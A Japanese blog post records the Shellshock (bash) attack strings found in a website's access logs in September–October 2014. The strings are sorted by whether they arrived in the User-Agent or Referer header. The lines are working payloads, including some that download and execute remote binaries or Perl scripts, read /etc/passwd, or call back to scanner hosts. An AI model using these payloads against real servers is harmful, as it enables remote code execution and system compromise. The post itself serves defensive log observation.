cNotes 検索 一覧 カテゴリ

cNotesサイトへのアクセスログ(shellshock)

Published: 2014/10/04

cNotes サイトに記録されていた shellshock 問題へのアクセスログです。日時は、アクセスパタンの初出です。

Uesr-Agent に格納されていた shellshock 問題へのアクセス

 2014-09-26T17:37:53 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html), () { :; }; /usr/bin/wget web5.mooo.com/bashvultest
 2014-09-26T22:04:55 () { :;}; /usr/bin/wget http://web5.mooo.com/bashvultest
 2014-09-27T07:23:07 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-wget
 2014-09-27T07:23:07 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-curl
 2014-09-27T07:23:07 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-local-bin-wget
 2014-09-27T07:23:08 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-usr-bin-wget
 2014-09-27T07:23:08 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-wget'
 2014-09-27T07:23:09 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-curl'
 2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-local-bin-wget'
 2014-09-27T07:23:21 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/User-Agent-bash-c-usr-bin-wget'
 2014-09-27T17:43:21 () { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z xxx.xxx.xxx.xxx/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"
 2014-09-27T23:51:00 () { foo;};echo;/bin/cat /etc/passwd
 2014-09-28T00:15:47 () { 1;}; echo -e \header:kbash-scaned2\""
 2014-09-28T00:17:39 () { foo;};echo;/sbin/ifconfig
 2014-09-29T03:39:19 () { :;}; /bin/bash -c \"cd /tmp;wget http://xxx.xxx.xxx.xxx/ji;curl -O /tmp/ji http://xxx.xxx.xxx.xxx/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"
 2014-09-29T07:01:07 () { :;}; /bin/bash -c \"wget http://xxx.xxx.xxx.xxx/bash-count.txt\"
 2014-09-29T11:56:25 () { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a
 2014-09-30T07:54:07 () { :; }; echo Content-Type:text/plain; echo ; echo VULN-VULN-VULN-BASH-CGI
 2014-09-30T18:12:22 () { :; }; echo; echo `echo '>>>asdf'; echo fuckasdf;echo '<<<asdf'`
 2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
 2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;

Referer に格納されていた shellshock 問題へのアクセス

 2014-09-25T06:18:05 () { :; }; ping -c 11 xxx.xxx.xxx.xxx
 2014-09-27T07:23:39 () { :;}; wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-wget
 2014-09-27T07:23:40 () { :;}; curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-curl
 2014-09-27T07:23:46 () { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-local-bin-wget
 2014-09-27T07:23:46 () { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-usr-bin-wget
 2014-09-27T07:23:47 () { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-wget'
 2014-09-27T07:23:47 () { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-curl'
 2014-09-27T07:23:47 () { (a)=>' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-local-bin-wget'
 2014-09-27T07:23:48 () { (a)=>' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/PF**********************UV/Referer-bash-c-usr-bin-wget'
 2014-09-28T13:19:03 () { :;}; echo 'Shellshock: Vulnerable'
 2014-09-30T19:46:05 () { :;};echo;echo \8\"6ff49a7d633f829bbbfadc7c40d26bf;echo;exit"
 2014-10-01T16:56:25 () { :;}; echo; /usr/bin/wget http://xxx.xxx.xxx.xxx/robots.txt?http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=BBB+-+mail.html;

[カテゴリ:Webサーバー観察日記]

@Sam